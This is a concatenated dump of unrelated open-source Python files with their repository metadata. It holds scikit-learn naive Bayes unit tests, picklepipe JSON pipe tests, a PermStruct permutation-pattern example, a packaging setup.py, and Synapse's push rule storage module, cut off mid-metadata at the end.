    clf_pf = GaussianNB().partial_fit(X, y, np.unique(y))
    assert_array_almost_equal(clf.theta_, clf_pf.theta_)
    assert_array_almost_equal(clf.sigma_, clf_pf.sigma_)
    assert_array_almost_equal(clf.class_prior_, clf_pf.class_prior_)
    # Feeding the data in two interleaved halves must also match a full fit.
    clf_pf2 = GaussianNB().partial_fit(X[0::2, :], y[0::2], np.unique(y))
    clf_pf2.partial_fit(X[1::2], y[1::2])
    assert_array_almost_equal(clf.theta_, clf_pf2.theta_)
    assert_array_almost_equal(clf.sigma_, clf_pf2.sigma_)
    assert_array_almost_equal(clf.class_prior_, clf_pf2.class_prior_)
def test_discretenb_pickle():
    # Test picklability of discrete naive Bayes classifiers
    for cls in [BernoulliNB, MultinomialNB, GaussianNB]:
        clf = cls().fit(X2, y2)
        y_pred = clf.predict(X2)
        # Round-trip the fitted model through pickle; predictions must
        # be unchanged.
        store = BytesIO()
        pickle.dump(clf, store)
        clf = pickle.load(BytesIO(store.getvalue()))
        assert_array_equal(y_pred, clf.predict(X2))
        if cls is not GaussianNB:
            # TODO re-enable me when partial_fit is implemented for GaussianNB
            # Test pickling of estimator trained with partial_fit
            clf2 = cls().partial_fit(X2[:3], y2[:3], classes=np.unique(y2))
            clf2.partial_fit(X2[3:], y2[3:])
            store = BytesIO()
            pickle.dump(clf2, store)
            clf2 = pickle.load(BytesIO(store.getvalue()))
            assert_array_equal(y_pred, clf2.predict(X2))
def test_input_check_fit():
    # Test input checks for the fit method
    for cls in [BernoulliNB, MultinomialNB, GaussianNB]:
        # check shape consistency for number of samples at fit time
        assert_raises(ValueError, cls().fit, X2, y2[:-1])
        # check shape consistency for number of input features at predict time
        clf = cls().fit(X2, y2)
        assert_raises(ValueError, clf.predict, X2[:, :-1])
def test_input_check_partial_fit():
    # Same input validation, exercised through partial_fit.
    for cls in [BernoulliNB, MultinomialNB]:
        # check shape consistency
        assert_raises(ValueError, cls().partial_fit, X2, y2[:-1],
                      classes=np.unique(y2))
        # classes is required for first call to partial fit
        assert_raises(ValueError, cls().partial_fit, X2, y2)
        # check consistency of consecutive classes values
        clf = cls()
        clf.partial_fit(X2, y2, classes=np.unique(y2))
        assert_raises(ValueError, clf.partial_fit, X2, y2,
                      classes=np.arange(42))
        # check consistency of input shape for partial_fit
        assert_raises(ValueError, clf.partial_fit, X2[:, :-1], y2)
        # check consistency of input shape for predict
        assert_raises(ValueError, clf.predict, X2[:, :-1])
def test_discretenb_predict_proba():
    # Test discrete NB classes' probability scores
    # The 100s below distinguish Bernoulli from multinomial.
    # FIXME: write a test to show this.
    X_bernoulli = [[1, 100, 0], [0, 1, 0], [0, 100, 1]]
    X_multinomial = [[0, 1], [1, 3], [4, 0]]
    # test binary case (1-d output)
    y = [0, 0, 2] # 2 is regression test for binary case, 02e673
    for cls, X in zip([BernoulliNB, MultinomialNB],
                      [X_bernoulli, X_multinomial]):
        clf = cls().fit(X, y)
        assert_equal(clf.predict(X[-1:]), 2)
        assert_equal(clf.predict_proba([X[0]]).shape, (1, 2))
        # Per-row probabilities must sum to 1.
        assert_array_almost_equal(clf.predict_proba(X[:2]).sum(axis=1),
                                  np.array([1., 1.]), 6)
    # test multiclass case (2-d output, must sum to one)
    y = [0, 1, 2]
    for cls, X in zip([BernoulliNB, MultinomialNB],
                      [X_bernoulli, X_multinomial]):
        clf = cls().fit(X, y)
        assert_equal(clf.predict_proba(X[0:1]).shape, (1, 3))
        assert_equal(clf.predict_proba(X[:2]).shape, (2, 3))
        assert_almost_equal(np.sum(clf.predict_proba([X[1]])), 1)
        assert_almost_equal(np.sum(clf.predict_proba([X[-1]])), 1)
        assert_almost_equal(np.sum(np.exp(clf.class_log_prior_)), 1)
        assert_almost_equal(np.sum(np.exp(clf.intercept_)), 1)
def test_discretenb_uniform_prior():
    # Test whether discrete NB classes fit a uniform prior
    # when fit_prior=False and class_prior=None
    for cls in [BernoulliNB, MultinomialNB]:
        clf = cls()
        clf.set_params(fit_prior=False)
        clf.fit([[0], [0], [1]], [0, 0, 1])
        prior = np.exp(clf.class_log_prior_)
        assert_array_equal(prior, np.array([.5, .5]))
def test_discretenb_provide_prior():
    # Test whether discrete NB classes use provided prior
    for cls in [BernoulliNB, MultinomialNB]:
        clf = cls(class_prior=[0.5, 0.5])
        clf.fit([[0], [0], [1]], [0, 0, 1])
        prior = np.exp(clf.class_log_prior_)
        assert_array_equal(prior, np.array([.5, .5]))
        # Inconsistent number of classes with prior
        assert_raises(ValueError, clf.fit, [[0], [1], [2]], [0, 1, 2])
        assert_raises(ValueError, clf.partial_fit, [[0], [1]], [0, 1],
                      classes=[0, 1, 1])
def test_discretenb_provide_prior_with_partial_fit():
    # Test whether discrete NB classes use provided prior
    # when using partial_fit
    iris = load_iris()
    iris_data1, iris_data2, iris_target1, iris_target2 = train_test_split(
        iris.data, iris.target, test_size=0.4, random_state=415)
    for cls in [BernoulliNB, MultinomialNB]:
        for prior in [None, [0.3, 0.3, 0.4]]:
            clf_full = cls(class_prior=prior)
            clf_full.fit(iris.data, iris.target)
            clf_partial = cls(class_prior=prior)
            clf_partial.partial_fit(iris_data1, iris_target1,
                                    classes=[0, 1, 2])
            clf_partial.partial_fit(iris_data2, iris_target2)
            # The learned log prior must not depend on whether the data
            # arrived all at once or in two partial_fit batches.
            assert_array_almost_equal(clf_full.class_log_prior_,
                                      clf_partial.class_log_prior_)
def test_sample_weight_multiclass():
    # Nose-style generator test: yields one check per discrete NB class.
    for cls in [BernoulliNB, MultinomialNB]:
        # check shape consistency for number of samples at fit time
        yield check_sample_weight_multiclass, cls
def check_sample_weight_multiclass(cls):
    X = [
        [0, 0, 1],
        [0, 1, 1],
        [0, 1, 1],
        [1, 0, 0],
    ]
    y = [0, 0, 1, 2]
    # Note: the expected predictions [0, 1, 1, 2] below differ from y on
    # the second sample -- the weights change the decision there.
    sample_weight = np.array([1, 1, 2, 2], dtype=np.float64)
    sample_weight /= sample_weight.sum()
    clf = cls().fit(X, y, sample_weight=sample_weight)
    assert_array_equal(clf.predict(X), [0, 1, 1, 2])
    # Check sample weight using the partial_fit method
    clf = cls()
    clf.partial_fit(X[:2], y[:2], classes=[0, 1, 2],
                    sample_weight=sample_weight[:2])
    clf.partial_fit(X[2:3], y[2:3], sample_weight=sample_weight[2:3])
    clf.partial_fit(X[3:], y[3:], sample_weight=sample_weight[3:])
    assert_array_equal(clf.predict(X), [0, 1, 1, 2])
def test_sample_weight_mnb():
    clf = MultinomialNB()
    # The third sample carries weight 4, so class 1 gets prior 4/6 = 2/3,
    # as asserted on the intercept below.
    clf.fit([[1, 2], [1, 2], [1, 0]],
            [0, 0, 1],
            sample_weight=[1, 1, 4])
    assert_array_equal(clf.predict([[1, 0]]), [1])
    positive_prior = np.exp(clf.intercept_[0])
    assert_array_almost_equal([1 - positive_prior, positive_prior],
                              [1 / 3., 2 / 3.])
def test_coef_intercept_shape():
    # coef_ and intercept_ should have shapes as in other linear models.
    # Non-regression test for issue #2127.
    X = [[1, 0, 0], [1, 1, 1]]
    y = [1, 2] # binary classification
    for clf in [MultinomialNB(), BernoulliNB()]:
        clf.fit(X, y)
        assert_equal(clf.coef_.shape, (1, 3))
        assert_equal(clf.intercept_.shape, (1,))
def test_check_accuracy_on_digits():
    # Non regression test to make sure that any further refactoring / optim
    # of the NB models do not harm the performance on a slightly non-linearly
    # separable dataset
    digits = load_digits()
    X, y = digits.data, digits.target
    # A binary sub-problem restricted to the digits 3 and 8.
    binary_3v8 = np.logical_or(digits.target == 3, digits.target == 8)
    X_3v8, y_3v8 = X[binary_3v8], y[binary_3v8]
    # Multinomial NB
    scores = cross_val_score(MultinomialNB(alpha=10), X, y, cv=10)
    assert_greater(scores.mean(), 0.86)
    scores = cross_val_score(MultinomialNB(alpha=10), X_3v8, y_3v8, cv=10)
    assert_greater(scores.mean(), 0.94)
    # Bernoulli NB
    # (features are binarized with a > 4 threshold for the Bernoulli model)
    scores = cross_val_score(BernoulliNB(alpha=10), X > 4, y, cv=10)
    assert_greater(scores.mean(), 0.83)
    scores = cross_val_score(BernoulliNB(alpha=10), X_3v8 > 4, y_3v8, cv=10)
    assert_greater(scores.mean(), 0.92)
    # Gaussian NB
    scores = cross_val_score(GaussianNB(), X, y, cv=10)
    assert_greater(scores.mean(), 0.77)
    scores = cross_val_score(GaussianNB(), X_3v8, y_3v8, cv=10)
    assert_greater(scores.mean(), 0.86)
def test_feature_log_prob_bnb():
    # Test for issue #4268.
    # Tests that the feature log prob value computed by BernoulliNB when
    # alpha=1.0 is equal to the expression given in Manning, Raghavan,
    # and Schuetze's "Introduction to Information Retrieval" book:
    # http://nlp.stanford.edu/IR-book/html/htmledition/the-bernoulli-model-1.html
    X = np.array([[0, 0, 0], [1, 1, 0], [0, 1, 0], [1, 0, 1], [0, 1, 0]])
    Y = np.array([0, 0, 1, 2, 2])
    # Fit Bernoulli NB w/ alpha = 1.0
    clf = BernoulliNB(alpha=1.0)
    clf.fit(X, Y)
    # Manually form the (log) numerator and denominator that
    # constitute P(feature presence | class)
    num = np.log(clf.feature_count_ + 1.0)
    denom = np.tile(np.log(clf.class_count_ + 2.0), (X.shape[1], 1)).T
    # Check manual estimate matches
    assert_array_almost_equal(clf.feature_log_prob_, (num - denom))
def test_bnb():
    # Tests that BernoulliNB when alpha=1.0 gives the same values as
    # those given for the toy example in Manning, Raghavan, and
    # Schuetze's "Introduction to Information Retrieval" book:
    # http://nlp.stanford.edu/IR-book/html/htmledition/the-bernoulli-model-1.html
    # Training data points are:
    # Chinese Beijing Chinese (class: China)
    # Chinese Chinese Shanghai (class: China)
    # Chinese Macao (class: China)
    # Tokyo Japan Chinese (class: Japan)
    # Features are Beijing, Chinese, Japan, Macao, Shanghai, and Tokyo
    X = np.array([[1, 1, 0, 0, 0, 0],
                  [0, 1, 0, 0, 1, 0],
                  [0, 1, 0, 1, 0, 0],
                  [0, 1, 1, 0, 0, 1]])
    # Classes are China (0), Japan (1)
    Y = np.array([0, 0, 0, 1])
    # Fit BernoulliNB w/ alpha = 1.0
    clf = BernoulliNB(alpha=1.0)
    clf.fit(X, Y)
    # Check the class prior is correct
    class_prior = np.array([0.75, 0.25])
    assert_array_almost_equal(np.exp(clf.class_log_prior_), class_prior)
    # Check the feature probabilities are correct
    feature_prob = np.array([[0.4, 0.8, 0.2, 0.4, 0.4, 0.2],
                             [1/3.0, 2/3.0, 2/3.0, 1/3.0, 1/3.0, 2/3.0]])
    assert_array_almost_equal(np.exp(clf.feature_log_prob_), feature_prob)
    # Testing data point is:
    # Chinese Chinese Chinese Tokyo Japan
    X_test = np.array([[0, 1, 1, 0, 0, 1]])
    # Check the predictive probabilities are correct
    unnorm_predict_proba = np.array([[0.005183999999999999,
                                      0.02194787379972565]])
    predict_proba = unnorm_predict_proba / np.sum(unnorm_predict_proba)
    assert_array_almost_equal(clf.predict_proba(X_test), predict_proba)
def test_naive_bayes_scale_invariance():
    # Scaling the data should not change the prediction results
    iris = load_iris()
    X, y = iris.data, iris.target
    # Fit/predict the same data at three very different scales; the
    # resulting labels must be identical.
    labels = [GaussianNB().fit(f * X, y).predict(f * X)
              for f in [1E-10, 1, 1E10]]
    assert_array_equal(labels[0], labels[1])
    assert_array_equal(labels[1], labels[2])
def test_alpha():
    # Setting alpha=0 should not output nan results when p(x_i|y_j)=0 is a case
    X = np.array([[1, 0], [1, 1]])
    y = np.array([0, 1])
    # alpha=0 triggers a UserWarning but must still give finite, exact
    # probabilities on both fit and partial_fit paths.
    nb = BernoulliNB(alpha=0.)
    assert_warns(UserWarning, nb.partial_fit, X, y, classes=[0, 1])
    assert_warns(UserWarning, nb.fit, X, y)
    prob = np.array([[1, 0], [0, 1]])
    assert_array_almost_equal(nb.predict_proba(X), prob)
    nb = MultinomialNB(alpha=0.)
    assert_warns(UserWarning, nb.partial_fit, X, y, classes=[0, 1])
    assert_warns(UserWarning, nb.fit, X, y)
    prob = np.array([[2./3, 1./3], [0, 1]])
    assert_array_almost_equal(nb.predict_proba(X), prob)
    # Test sparse X
    X = scipy.sparse.csr_matrix(X)
    nb = BernoulliNB(alpha=0.)
    assert_warns(UserWarning, nb.fit, X, y)
    prob = np.array([[1, 0], [0, 1]])
    assert_array_almost_equal(nb.predict_proba(X), prob)
    nb = MultinomialNB(alpha=0.)
    assert_warns(UserWarning, nb.fit, X, y)
    prob = np.array([[2./3, 1./3], [0, 1]])
    assert_array_almost_equal(nb.predict_proba(X), prob)
    # Test for alpha < 0
    # (a negative smoothing parameter must raise with this exact message)
    X = np.array([[1, 0], [1, 1]])
    y = np.array([0, 1])
    expected_msg = ('Smoothing parameter alpha = -1.0e-01. '
                    'alpha should be > 0.')
    b_nb = BernoulliNB(alpha=-0.1)
    m_nb = MultinomialNB(alpha=-0.1)
    assert_raise_message(ValueError, expected_msg, b_nb.fit, X, y)
    assert_raise_message(ValueError, expected_msg, m_nb.fit, X, y)
    b_nb = BernoulliNB(alpha=-0.1)
    m_nb = MultinomialNB(alpha=-0.1)
    assert_raise_message(ValueError, expected_msg, b_nb.partial_fit,
                         X, y, classes=[0, 1])
    assert_raise_message(ValueError, expected_msg, m_nb.partial_fit,
                         X, y, classes=[0, 1])
| {
"content_hash": "a8d991f06ee3abcaa8e8e89a7f96f377",
"timestamp": "",
"source": "github",
"line_count": 586,
"max_line_length": 81,
"avg_line_length": 37.2098976109215,
"alnum_prop": 0.6187571657876634,
"repo_name": "rvraghav93/scikit-learn",
"id": "f43ddf0a0c553cf502a5e373476b8d64a8c9505e",
"size": "21805",
"binary": false,
"copies": "11",
"ref": "refs/heads/master",
"path": "sklearn/tests/test_naive_bayes.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "C",
"bytes": "394787"
},
{
"name": "C++",
"bytes": "140225"
},
{
"name": "Makefile",
"bytes": "1579"
},
{
"name": "PowerShell",
"bytes": "17042"
},
{
"name": "Python",
"bytes": "6420784"
},
{
"name": "Shell",
"bytes": "9256"
}
],
"symlink_target": ""
} |
import json
import socket
import unittest
import picklepipe
def _safe_close(pipe):
    """Close *pipe*, swallowing any error raised by close().

    Used as a test-cleanup callback where the pipe may already be
    closed or broken.
    """
    try:
        pipe.close()
    except Exception:
        # Catch Exception instead of a bare except so that
        # KeyboardInterrupt/SystemExit still propagate.
        pass
class TestJSONPipe(unittest.TestCase):
    """Tests for picklepipe's JSON-serializing pipe."""
    def make_pipe_pair(self):
        # Create a connected (reader, writer) JSONPipe pair; both ends are
        # closed automatically when the test finishes (_safe_close
        # tolerates already-closed/broken pipes).
        rd, wr = picklepipe.make_pipe_pair(picklepipe.JSONPipe)
        assert isinstance(rd, picklepipe.BaseSerializingPipe)
        assert isinstance(wr, picklepipe.BaseSerializingPipe)
        self.addCleanup(_safe_close, rd)
        self.addCleanup(_safe_close, wr)
        return rd, wr
    def make_socketpair(self):
        # Helper producing a raw connected socket pair; imported lazily so
        # merely loading this module does not require the helper module.
        from picklepipe.socketpair import socketpair
        return socketpair()
    def test_send_jsonable_objects(self):
        # Values that JSON can represent must round-trip unchanged.
        objects = ['abc',
                   1,
                   [1, '2', [3]],
                   {'a': ['b', 1, {'c': 'd', 'e': [2, 'f']}]}]
        for obj in objects:
            rd, wr = self.make_pipe_pair()
            wr.send_object(obj)
            self.assertEqual(obj, rd.recv_object(timeout=0.1))
    def test_send_non_jsonable_objects(self):
        # Values JSON cannot encode must raise PipeSerializingError
        # wrapping the underlying TypeError.
        objects = [set(),
                   socket.socket(),
                   {'a': [1, 2, '3', object()]}]
        for obj in objects:
            rd, wr = self.make_pipe_pair()
            try:
                wr.send_object(obj)
            except picklepipe.PipeSerializingError as e:
                self.assertIsInstance(e.exception, TypeError)
            else:
                self.fail('Didn\'t raise picklepipe.PipeSerializingError')
| {
"content_hash": "eed7d073df2a660acfd7da02aec5ce90",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 74,
"avg_line_length": 30.5,
"alnum_prop": 0.5505464480874317,
"repo_name": "SethMichaelLarson/picklepipe",
"id": "dc0afb6470b13cbbae196b96aa3734cd2128073e",
"size": "1464",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_json_pipe.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "PowerShell",
"bytes": "7194"
},
{
"name": "Python",
"bytes": "30952"
},
{
"name": "Shell",
"bytes": "1305"
}
],
"symlink_target": ""
} |
from __future__ import print_function
from permuta import *
import permstruct
import permstruct.dag
from permstruct import *
from permstruct.dag import taylor_dag
import sys
is_classical = True
# -- Examples from Vatter paper -- #
# STATUS ================================================ >
# Bug fix: use a list comprehension instead of map() so the patterns
# survive repeated iteration -- under Python 3 (this file imports
# print_function from __future__, targeting 2/3), map() returns a
# one-shot iterator that would be exhausted after a single pass.
patts = [Permutation(p) for p in [[2, 1, 4, 3], [3, 1, 4, 2], [3, 2, 1]]]
# ------------------------------------------------------------------------------
perm_bound = 5
verify_bound = 10
ignored = 0
# The dag
max_len_patt = 3
upper_bound = None
remove = False
# Grids
max_rule_size = (5, 5)
max_non_empty = 5
max_rules = None
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
settings = StructSettings(
    perm_bound=perm_bound,
    verify_bound=verify_bound,
    max_rule_size=max_rule_size,
    max_non_empty=max_non_empty,
    max_rules=max_rules,
    verbosity=StructLogger.INFO)
# settings.set_input(StructInput.from_avoidance(settings, patts))
settings.set_input(AvoiderInput(settings, patts))
settings.set_dag(taylor_dag(settings,
                            max_len_patt=max_len_patt,
                            remove=remove,
                            upper_bound=upper_bound))
exhaustive(settings)
| {
"content_hash": "83d9cab498bf42148b4e6c088986459a",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 80,
"avg_line_length": 26.8,
"alnum_prop": 0.5022388059701492,
"repo_name": "PermutaTriangle/PermStruct",
"id": "68b762ae815951d629c9938dbe1187e1fc9cab95",
"size": "1340",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/classical_computing_non_poly_bases/b13.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Haskell",
"bytes": "891"
},
{
"name": "Makefile",
"bytes": "381"
},
{
"name": "Python",
"bytes": "898912"
}
],
"symlink_target": ""
} |
import io
import os
import sys
from codecs import open
from setuptools import setup, find_packages, Command
from shutil import rmtree
# General Attributes and Requirements
NAME = 'getmagpi'
DESCRIPTION = 'A simple utility to synchronize free MagPi PDF content.'
URL = 'https://jnario.github.io/getmagpi/'
# Bug fix: EMAIL and AUTHOR previously ended with stray trailing commas,
# which made each of them a one-element *tuple*; setup() then received a
# tuple for author/author_email instead of a string.
EMAIL = 'jose@nario.com'
AUTHOR = 'Jose Nario'
REQUIRED = ['requests', 'beautifulsoup4']
# Absolute directory containing this setup.py.
here = os.path.abspath(os.path.dirname(__file__))
# Long Description -- remember to add readme to MANIFEST.IN
with io.open(os.path.join(here, 'README.rst'), encoding='utf-8') as f:
    long_description = '\n' + f.read()
# Version: execute <NAME>/__version__.py into `about` to read __version__.
about = {}
with open(os.path.join(here, NAME, '__version__.py')) as f:
    exec(f.read(), about)
class PublishCommand(Command):
    """Support setup.py publish.

    Registered via ``cmdclass`` below; invoked as
    ``python setup.py publish``.
    """
    description = 'Build and publish the package.'
    user_options = []
    @staticmethod
    def status(s):
        """Prints things in bold."""
        print('\033[1m{0}\033[0m'.format(s))
    def initialize_options(self):
        # Required by the distutils Command interface; nothing to set up.
        pass
    def finalize_options(self):
        # Required by the distutils Command interface; nothing to finalize.
        pass
    def run(self):
        # Clean, build an sdist + universal wheel, and upload via twine.
        try:
            self.status('Removing previous builds…')
            rmtree(os.path.join(here, 'dist'))
        except FileNotFoundError:
            # No previous build directory: nothing to clean up.
            pass
        self.status('Building Source and Wheel (universal) distribution…')
        os.system('{0} setup.py sdist bdist_wheel --universal'.format(sys.executable))
        self.status('Uploading the package to PyPi via Twine…')
        os.system('twine upload dist/*')
        sys.exit()
# Register package metadata with setuptools; `publish` is wired in below.
setup(
    name=NAME,
    version=about['__version__'],
    description=DESCRIPTION,
    long_description=long_description,
    author=AUTHOR,
    author_email=EMAIL,
    url=URL,
    # Packages (one or the other)
    # packages=find_packages(exclude=['contrib', 'docs', 'tests']),
    py_modules=['getmagpi'],
    # entry_points={
    #     'console_scripts': [
    #         'getmagpi = getmagpi:main'
    #     ],
    # },
    install_requires=REQUIRED,
    # BUG FIX: keyword was misspelled 'include_package_date', which
    # setuptools silently ignored, so MANIFEST.in package data was never
    # included in built distributions.
    include_package_data=True,
    license='MIT',
    keywords='magpi raspberrypi library',
    classifiers=[
        # Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
        'Development Status :: 3 - Alpha',
        'Environment :: Console',
        'Intended Audience :: Developers',
        'Intended Audience :: End Users/Desktop',
        'Topic :: Internet',
        'Topic :: Internet :: WWW/HTTP :: HTTP Servers',
        'Topic :: System :: Archiving :: Mirroring',
        'Topic :: Utilities',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
    ],
    # $ setup.py publish support.
    cmdclass={
        'publish': PublishCommand,
    },
)
) | {
"content_hash": "2406ab732de08129476ad63c1bb677dc",
"timestamp": "",
"source": "github",
"line_count": 104,
"max_line_length": 86,
"avg_line_length": 28.23076923076923,
"alnum_prop": 0.6130790190735694,
"repo_name": "jnario/getmagpi",
"id": "5790289265b0254843918585ce3cab362fc51ee5",
"size": "2978",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7231"
}
],
"symlink_target": ""
} |
from ._base import SQLBaseStore, cached
from twisted.internet import defer
import logging
import simplejson as json
logger = logging.getLogger(__name__)
class PushRuleStore(SQLBaseStore):
    """Storage layer for per-user push notification rules.

    Rules live in the ``push_rules`` table; their per-user on/off switches
    live in ``push_rules_enable``.  Both per-user getters are cached, so
    every writer invalidates those caches after its transaction commits.
    """
    @cached()
    @defer.inlineCallbacks
    def get_push_rules_for_user(self, user_name):
        """Return all push rules owned by `user_name`, highest priority first.

        Args:
            user_name (str): The matrix ID of the rules' owner.
        Returns:
            Deferred list of dicts, one per push_rules row.
        """
        rows = yield self._simple_select_list(
            table=PushRuleTable.table_name,
            keyvalues={
                "user_name": user_name,
            },
            retcols=PushRuleTable.fields,
            # BUG FIX: desc was copy-pasted from the *_enabled_* query,
            # mislabelling this query in metrics/logging.
            desc="get_push_rules_for_user",
        )
        # Highest priority class first, then highest priority within it.
        rows.sort(
            key=lambda row: (-int(row["priority_class"]), -int(row["priority"]))
        )
        defer.returnValue(rows)
    @cached()
    @defer.inlineCallbacks
    def get_push_rules_enabled_for_user(self, user_name):
        """Return a dict mapping rule_id -> enabled (bool) for `user_name`."""
        results = yield self._simple_select_list(
            table=PushRuleEnableTable.table_name,
            keyvalues={
                'user_name': user_name
            },
            retcols=PushRuleEnableTable.fields,
            desc="get_push_rules_enabled_for_user",
        )
        # The column stores 0/1; expose it as a proper bool.
        defer.returnValue({
            r['rule_id']: False if r['enabled'] == 0 else True for r in results
        })
    @defer.inlineCallbacks
    def add_push_rule(self, before, after, **kwargs):
        """Add a push rule, optionally positioned relative to another rule.

        Args:
            before: rule_id the new rule is inserted before, or falsy.
            after: rule_id the new rule is inserted after, or falsy.
            **kwargs: column values for the new rule; 'conditions' and
                'actions' may be structures and are JSON-encoded here.
        """
        vals = kwargs
        if 'conditions' in vals:
            vals['conditions'] = json.dumps(vals['conditions'])
        if 'actions' in vals:
            vals['actions'] = json.dumps(vals['actions'])
        # we could check the rest of the keys are valid column names
        # but sqlite will do that anyway so I think it's just pointless.
        vals.pop("id", None)
        if before or after:
            ret = yield self.runInteraction(
                "_add_push_rule_relative_txn",
                self._add_push_rule_relative_txn,
                before=before,
                after=after,
                **vals
            )
            defer.returnValue(ret)
        else:
            ret = yield self.runInteraction(
                "_add_push_rule_highest_priority_txn",
                self._add_push_rule_highest_priority_txn,
                **vals
            )
            defer.returnValue(ret)
    def _add_push_rule_relative_txn(self, txn, user_name, **kwargs):
        """Insert a rule directly before/after an existing rule (in a txn).

        Raises:
            RuleNotFoundException: if the anchor rule does not exist.
            InconsistentRuleException: if an explicit priority_class does
                not match the anchor rule's class.
        """
        after = kwargs.pop("after", None)
        # Anchor on 'before' if given, otherwise on 'after'.
        relative_to_rule = kwargs.pop("before", after)
        res = self._simple_select_one_txn(
            txn,
            table=PushRuleTable.table_name,
            keyvalues={
                "user_name": user_name,
                "rule_id": relative_to_rule,
            },
            retcols=["priority_class", "priority"],
            allow_none=True,
        )
        if not res:
            raise RuleNotFoundException(
                "before/after rule not found: %s" % (relative_to_rule,)
            )
        priority_class = res["priority_class"]
        base_rule_priority = res["priority"]
        if 'priority_class' in kwargs and kwargs['priority_class'] != priority_class:
            raise InconsistentRuleException(
                "Given priority class does not match class of relative rule"
            )
        new_rule = kwargs
        new_rule.pop("before", None)
        new_rule.pop("after", None)
        new_rule['priority_class'] = priority_class
        new_rule['user_name'] = user_name
        new_rule['id'] = self._push_rule_id_gen.get_next_txn(txn)
        # check if the priority before/after is free
        new_rule_priority = base_rule_priority
        if after:
            new_rule_priority -= 1
        else:
            new_rule_priority += 1
        new_rule['priority'] = new_rule_priority
        sql = (
            "SELECT COUNT(*) FROM " + PushRuleTable.table_name +
            " WHERE user_name = ? AND priority_class = ? AND priority = ?"
        )
        txn.execute(sql, (user_name, priority_class, new_rule_priority))
        res = txn.fetchall()
        num_conflicting = res[0][0]
        # if there are conflicting rules, bump everything
        if num_conflicting:
            sql = "UPDATE "+PushRuleTable.table_name+" SET priority = priority "
            if after:
                sql += "-1"
            else:
                sql += "+1"
            sql += " WHERE user_name = ? AND priority_class = ? AND priority "
            if after:
                sql += "<= ?"
            else:
                sql += ">= ?"
            txn.execute(sql, (user_name, priority_class, new_rule_priority))
        # Caches must only be invalidated once the transaction commits.
        txn.call_after(
            self.get_push_rules_for_user.invalidate, user_name
        )
        txn.call_after(
            self.get_push_rules_enabled_for_user.invalidate, user_name
        )
        self._simple_insert_txn(
            txn,
            table=PushRuleTable.table_name,
            values=new_rule,
        )
    def _add_push_rule_highest_priority_txn(self, txn, user_name,
                                            priority_class, **kwargs):
        """Insert a rule at the top of its priority class (in a txn)."""
        # find the highest priority rule in that class
        sql = (
            "SELECT COUNT(*), MAX(priority) FROM " + PushRuleTable.table_name +
            " WHERE user_name = ? and priority_class = ?"
        )
        txn.execute(sql, (user_name, priority_class))
        res = txn.fetchall()
        (how_many, highest_prio) = res[0]
        new_prio = 0
        if how_many > 0:
            new_prio = highest_prio + 1
        # and insert the new rule
        new_rule = kwargs
        new_rule['id'] = self._push_rule_id_gen.get_next_txn(txn)
        new_rule['user_name'] = user_name
        new_rule['priority_class'] = priority_class
        new_rule['priority'] = new_prio
        # Caches must only be invalidated once the transaction commits.
        txn.call_after(
            self.get_push_rules_for_user.invalidate, user_name
        )
        txn.call_after(
            self.get_push_rules_enabled_for_user.invalidate, user_name
        )
        self._simple_insert_txn(
            txn,
            table=PushRuleTable.table_name,
            values=new_rule,
        )
    @defer.inlineCallbacks
    def delete_push_rule(self, user_name, rule_id):
        """
        Delete a push rule. Args specify the row to be deleted and can be
        any of the columns in the push_rule table, but below are the
        standard ones

        Args:
            user_name (str): The matrix ID of the push rule owner
            rule_id (str): The rule_id of the rule to be deleted
        """
        yield self._simple_delete_one(
            PushRuleTable.table_name,
            {'user_name': user_name, 'rule_id': rule_id},
            desc="delete_push_rule",
        )
        self.get_push_rules_for_user.invalidate(user_name)
        self.get_push_rules_enabled_for_user.invalidate(user_name)
    @defer.inlineCallbacks
    def set_push_rule_enabled(self, user_name, rule_id, enabled):
        """Switch a rule on or off for a user (upserts the enable row)."""
        ret = yield self.runInteraction(
            "_set_push_rule_enabled_txn",
            self._set_push_rule_enabled_txn,
            user_name, rule_id, enabled
        )
        defer.returnValue(ret)
    def _set_push_rule_enabled_txn(self, txn, user_name, rule_id, enabled):
        """Transaction body for set_push_rule_enabled."""
        new_id = self._push_rules_enable_id_gen.get_next_txn(txn)
        self._simple_upsert_txn(
            txn,
            PushRuleEnableTable.table_name,
            {'user_name': user_name, 'rule_id': rule_id},
            {'enabled': 1 if enabled else 0},
            {'id': new_id},
        )
        txn.call_after(
            self.get_push_rules_for_user.invalidate, user_name
        )
        txn.call_after(
            self.get_push_rules_enabled_for_user.invalidate, user_name
        )
class RuleNotFoundException(Exception):
    """Raised when the before/after anchor rule does not exist."""
class InconsistentRuleException(Exception):
    """Raised when a rule's priority class conflicts with its anchor rule."""
class PushRuleTable(object):
    """Schema constants for the ``push_rules`` table."""
    table_name = "push_rules"
    # Column names, in the order used as SELECT retcols.
    fields = "id user_name rule_id priority_class priority conditions actions".split()
class PushRuleEnableTable(object):
    """Schema constants for the ``push_rules_enable`` table."""
    table_name = "push_rules_enable"
    # Column names, in the order used as SELECT retcols.
    fields = "user_name rule_id enabled".split()
| {
"content_hash": "0bea265702ed5effc7be5db592f47dc7",
"timestamp": "",
"source": "github",
"line_count": 264,
"max_line_length": 85,
"avg_line_length": 30.693181818181817,
"alnum_prop": 0.5418980624460077,
"repo_name": "illicitonion/synapse",
"id": "4cac118d17c9965c9d9f9f34710e62015bc59762",
"size": "8706",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "synapse/storage/push_rule.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "1020"
},
{
"name": "HTML",
"bytes": "1223"
},
{
